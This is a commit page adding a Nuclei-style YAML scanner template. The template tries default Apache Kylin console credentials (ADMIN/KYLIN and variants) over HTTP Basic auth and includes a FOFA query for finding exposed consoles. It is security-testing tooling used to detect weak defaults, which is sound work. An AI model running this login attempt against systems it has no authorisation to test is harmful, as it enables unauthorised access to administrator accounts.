Merge pull request #8038 from projectdiscovery/kylin-default-password

Create kylin-default-password.yaml
patch-1
Ritik Chaddha 2023-08-22 17:22:11 +05:30 committed by GitHub
commit 83f89e0275
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 53 additions and 0 deletions

View File

@ -0,0 +1,53 @@
id: kylin-default-login
info:
name: Apache Kylin Console - Default Login
author: SleepingBag945
severity: high
description: |
The default password for the Apache Kylin Console is KYLIN for the ADMIN user in Kylin versions before 3.0.0.
reference:
- https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml
- https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker
metadata:
max-request: 1
verified: true
fofa-query: app="APACHE-kylin"
tags: kylin,default-login,apache
http:
- raw:
- |
GET /kylin/api/user/authentication HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
attack: clusterbomb
payloads:
username:
- ADMIN
- admin
password:
- KYLIN
- kylin
- 123456
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"userDetails":'
- '"username":'
- '"password":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200